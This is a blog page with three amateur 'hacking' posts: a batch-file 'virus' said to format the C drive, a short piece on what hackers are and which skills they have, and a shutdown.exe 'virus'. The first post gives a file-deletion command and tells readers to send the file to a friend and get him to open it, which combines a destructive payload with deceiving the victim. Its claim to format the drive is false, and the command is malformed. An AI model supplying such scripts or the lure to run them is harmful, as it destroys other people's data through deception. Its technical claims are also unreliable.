Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Wednesday, 27 April 2016

Virus to Format the Disk

Virus to Format the Disk

Today, We are Going to Create a Virus that Format the C Drive.



Prerequisite 

1. A Computer.

Steps to Create Virus

1. Go to Start Menu.
2. Open notepad.
3. Just Copy and Paste the Below Code.
_______________Code_____________

@Echo off
Del C:\ *.* |y
________________________________

4. Save this File with ".bat" Extension.
5. Send this File to your Friend and tell him to open this File.

_______________________________Thank you_______________________________

Sunday, 17 April 2016

How to Become Hacker

How to Become Hacker

Today, I am Going to give you Knowledge about Who is Hacker and Skill's of Hacker

Who is a Hacker..???

The Hacker is the one who has good knowledge of computer. A Hacker is one who is able to gain the Unauthorized access to your Computer or your Privacy.

Types of hacker :-

1. Black Hat Hacker.
2. White Hat Hacker.
3. Grey Hat Hacker.


Skill's of Hacker :-

Hacker has good knowledge of all this module.

1. Networking.
2. Operating system.
3. Router.
4. Switch.
5. Applications 
6. Programming.
7. Scripting.
8. Database.

Wednesday, 13 April 2016

Virus That Shutdown Computer


Virus That Shutdown Computer

Today, We are going to create a "Virus" that Shutdown Computer.


We Requied Only:-

1.A computer.
2.Notepad.

Steps to Create virus :-


1.Open Notepad.
2.Type "shutdown.exe -s".This Command will immediately Shutdown Computer.
3.If you Want to Give some Time Use Command "shutdown.exe -s -t 45".This Command will Shutdown Computer after 45 seconds.
4.If you want to leave a Message Use Command "shutdown.exe -s -t 45 -c "comment"". At the Place of Comment You Can write your Message which You want to Show.
6.Run the Newly-Created File to run Your Shutdown Process.

____________________________Thankyou________________________________